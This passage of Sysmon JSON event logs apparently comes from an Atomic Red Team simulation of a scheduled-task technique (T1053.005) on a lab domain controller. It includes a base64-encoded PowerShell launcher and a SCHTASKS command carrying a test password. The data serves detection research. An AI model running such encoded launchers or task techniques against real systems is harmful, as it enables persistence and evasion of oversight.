06:55:22.526","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6094,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.526\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-0010CDCF0800}\r\nTargetProcessId: 4840\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.526","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-0010CDCF0800}","TargetProcessId":"4840","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6095,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.526\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-0010CDCF0800}\r\nTargetProcessId: 4840\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.526","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-0010CDCF0800}","TargetProcessId":"4840","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6096,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.526\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-0010CDCF0800}\r\nTargetProcessId: 4840\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.526","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-0010CDCF0800}","TargetProcessId":"4840","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6097,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.542\r\nProcessGuid: {E2A3D6B1-11DA-5F25-0000-0010D0D10800}\r\nProcessId: 2792\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"SCHTASKS /Delete /S localhost /RU DOMAIN\\user /RP At0micStrong /TN \"Atomic task\" /F >nul 2>&1\" \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D8-5F25-0000-0020C7800800}\r\nLogonId: 0x880C7\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-11D9-5F25-0000-0010B0A70800}\r\nParentProcessId: 1092\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADUAMwAuADAAMAA1ACIAIAAtAEMAbABlAGEAbgB1AHAA","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.542","ProcessGuid":"{E2A3D6B1-11DA-5F25-0000-0010D0D10800}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"SCHTASKS /Delete /S localhost /RU DOMAIN\\user /RP At0micStrong /TN \"Atomic task\" /F &gt;nul 2&gt;&amp;1\" ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D8-5F25-0000-0020C7800800}","LogonId":"0x880c7","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-11D9-5F25-0000-0010B0A70800}","ParentProcessId":"1092","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADUAMwAuADAAMAA1ACIAIAAtAEMAbABlAGEAbgB1AHAA","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6098,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.542\r\nSourceProcessGUID: {E2A3D6B1-11D9-5F25-0000-0010B0A70800}\r\nSourceProcessId: 1092\r\nSourceThreadId: 4108\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-0010D0D10800}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f53638(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f534ac(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fd5cd8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f4c094(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98a05037(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f1488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f72d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f56251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f481d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f81366(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.542","SourceProcessGUID":"{E2A3D6B1-11D9-5F25-0000-0010B0A70800}","SourceProcessId":"1092","SourceThreadId":"4108","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-0010D0D10800}","TargetProcessId":"2792","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+25c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f53638(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f534ac(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97fd5cd8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f4c094(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98a05037(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f1488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f72d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f56251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f481d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f81366(wow64)","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6099,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.542\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-0010D0D10800}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 